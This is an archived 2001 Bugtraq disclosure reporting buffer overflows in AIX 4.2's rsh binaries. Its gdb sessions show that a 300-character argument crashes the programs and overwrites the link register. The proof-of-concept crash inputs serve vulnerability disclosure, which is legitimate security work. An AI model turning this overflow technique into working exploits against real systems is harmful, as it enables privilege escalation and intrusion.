OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: ox (ymciss.com.tw)
Date: Mon Jun 11 2001 - 22:40:20 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Hello bugtraq,

        I am sorry if the problem had been found before, that is bufferoverflow what I found both /usr/bin/rsh and /usr/lpp/ssp/rcmd/bin/rsh.


    1. version description

    % oslevel
    4.2.0.0

    % uname -a
    AIX iss_tw 2 4 000342955700

    2. problem found

    /*********************************************************************************************************************/
    /* /usr/lpp/ssp/rcmd/bin/rsh problem */
    /* we can easy to overflow LR which AIX using to return from this register */
    /*********************************************************************************************************************/
    % /usr/local/bin/gdb /usr/lpp/ssp/rcmd/bin/rsh
    GDB is free software and you are welcome to distribute copies of it
     under certain conditions; type "show copying" to see the conditions.
    There is absolutely no warranty for GDB; type "show warranty" for details.
    GDB 4.16 (powerpc-ibm-aix4.1.4.0), Copyright 1996 Free Software Foundation, Inc...
    (no debugging symbols found)...
    (gdb) set args `perl -e 'print "A" x 300'` a
    (gdb) r
    Starting program: /usr/lpp/ssp/rcmd/bin/rsh `perl -e 'print "A" x 300'` a
    (no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
    Program received signal SIGSEGV, Segmentation fault.
    0x61616160 in ?? () from (unknown load module)
    (gdb) info register lr
    lr 0x61616161 1633771873
    (gdb)
    /*********************************************************************************************************************/

    another is

    /*********************************************************************************************************************/
    /* /usr/bin/rsh problem */
    /*********************************************************************************************************************/
    % /usr/local/bin/gdb /usr/bin/rsh
    GDB is free software and you are welcome to distribute copies of it
     under certain conditions; type "show copying" to see the conditions.
    There is absolutely no warranty for GDB; type "show warranty" for details.
    GDB 4.16 (powerpc-ibm-aix4.1.4.0), Copyright 1996 Free Software Foundation, Inc...
    (no debugging symbols found)...
    (gdb) set args `perl -e 'print "A" x 300'` a
    (gdb) r
    Starting program: /usr/bin/rsh `perl -e 'print "A" x 300'` a
    (no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
    Program received signal SIGSEGV, Segmentation fault.
    0x61616160 in ?? () from (unknown load module)
    (gdb) info register lr
    lr 0x61616161 1633771873
    (gdb)
    /*********************************************************************************************************************/


    Sincerely yours,


    --
    Yu-Min Chang
    ymciss.com.tw
    R&D Team, ISS-TW(internet security solutions, Taiwan)